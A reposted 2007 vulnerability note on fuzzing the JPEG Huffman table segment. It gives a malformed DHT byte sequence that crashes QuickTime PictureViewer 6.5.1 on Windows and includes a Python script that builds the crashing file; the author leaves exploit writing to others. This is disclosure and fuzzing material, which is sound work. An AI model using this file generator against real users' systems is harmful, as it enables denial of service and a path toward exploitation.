QuickTime malformed JPEG buffer overflow!

Author: anonymous   Source: unknown   Updated: 2007-1-25 10:58:34
When fuzzing an application with malformed input files, if we want to discover a vulnerability we have to create an input file that is very close to a valid file but still malformed in some way; that way the chances of discovery are greater. Now let's play with the JPEG format. We concentrate on the Huffman table segment (DHT); its marker is 0xFFC4.
Now take a valid JPEG file and replace the first DHT with this malformed DHT:
0xffc4021100ffff000000000000+0x01*510
Open this modified file with QuickTime PictureViewer (version 6.5.1) for Windows and QuickTime will crash, with Windows reporting an access violation error. The next step would be creating an exploit, but I leave that to people with more skill in doing that.
Here is a quick and dirty Python script for creating such a malformed file (the extracted copy had its backslashes turned into slashes; it is shown here as Python 3 with the escapes restored):
import struct

f = open(input("enter the path to the input file:\n"), "rb")
a = f.read()
f.close()
n = a.index(b"\xff\xc4")                          # offset of the first DHT marker
# length field of the original DHT segment (it counts its own two bytes)
dht_len = struct.unpack("!H", a[n + 2:n + 4])[0]
# keep everything before the DHT, splice in the malformed table
# (length 0x0211, BITS = FF FF + 14 zero bytes, 510 symbol bytes),
# then keep everything after the original DHT
b = (a[:n]
     + b"\xff\xc4\x02\x11\x00\xff\xff" + b"\x00" * 14 + b"\x01" * 510
     + a[n + 2 + dht_len:])
f = open(input("enter the path to the output file:\n"), "wb")
f.write(b)
f.close()
For details about the JPEG format take a look at:
http://www.w3.org/Graphics/JPEG/itu-t81.pdf [Reposted from 21safe (Century Security Network) http://www.21safe.com]